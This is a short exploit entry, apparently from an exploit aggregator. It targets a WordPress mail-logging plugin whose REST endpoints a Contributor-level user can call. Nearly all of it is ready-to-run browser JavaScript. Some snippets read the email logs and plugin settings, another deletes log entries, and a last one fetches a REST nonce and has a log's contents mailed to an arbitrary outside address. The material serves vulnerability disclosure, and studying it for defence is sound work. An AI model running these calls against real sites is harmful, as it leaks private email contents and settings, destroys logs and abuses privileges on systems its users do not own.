Share
## https://sploitus.com/exploit?id=WPEX-ID:08F1D623-0453-4103-A9AA-2D0DDB6EB69E
The following actions may be taken by a Contributor user:
---
/wml_logs - Information leak

Execute the following within a block editor page to read the logs:

await wp.apiFetch({path: 'wml/v1/wml_logs', method: 'POST', data: {pageSize: 10}});
---
/wml_logs/delete - Arbitrary log deletion

Execute the following within a block editor page to delete a log entry, ensuring the `data` array includes a valid ID for a log entry:

await wp.apiFetch({path: 'wml/v1/wml_logs/delete', method: 'POST', data: [1]});
---
/settings

Execute the following within a block editor page to get the plugin settings:

await wp.apiFetch({path: 'wml/v1/settings', method: 'POST', data: {callback: 'get'}});
---
/wml_logs/send_mail

Execute the following on any page of the site to send the information within a log to an arbitrary email address, ensuring the `id` parameter is a valid ID for a log entry.

var nonce = await (await fetch('/wp-admin/admin-ajax.php?action=rest-nonce')).text();

await (await fetch('/wp-json/wml/v1/wml_logs/send_mail', {method: 'POST', headers: {'Content-Type': 'application/x-www-form-urlencoded', 'X-WP-Nonce': nonce}, body: 'id=1&to_email=send@example.com'})).text();